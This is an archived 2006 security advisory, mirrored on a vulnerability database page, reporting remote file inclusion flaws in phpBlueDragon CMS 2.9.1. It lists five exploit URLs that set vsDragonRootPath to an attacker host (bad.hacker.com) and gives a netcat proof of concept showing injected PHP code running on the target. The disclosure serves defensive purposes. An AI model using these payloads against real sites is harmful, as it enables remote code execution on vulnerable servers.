Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13313
HistoryJun 25, 2006 - 12:00 a.m.

phpBlueDragon CMS 2.9.1 multiple remote file inclusion vuln

2006-06-2500:00:00
vulners.com
11
JSON

PHPBlueDragon CMS <= 2.9.1 http://phpbluedragon.net/

Affected files:

root_includes/root_modules/team_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/
root_includes/root_modules//rss_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/
root_includes/root_modules/manual_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/
root_includes/root_modules/forum_admin.php?action=group_move&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/
root_includes/root_modules/forum_admin.php?action=forum_move&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/

Solution:

None

Simple PoC:

nc -l -p 9999

http://some.site/root_includes/root_modules/forum_admin.php?action=forum_move&amp;template_redirect=yes&amp;vsDragonRootPath=http://192.168.0.xx:9999/

$ nc -l -p 9999
GET /public_includes/pub_kernel/pbd_move. HTTP/1.0
Host: 192.168.0.xx:9999

HTTP/0.9 200 OK

<?php phpinfo(); ?>

System OpenBSD xxx 3.9 xxx i386

Credits:
shm

JSON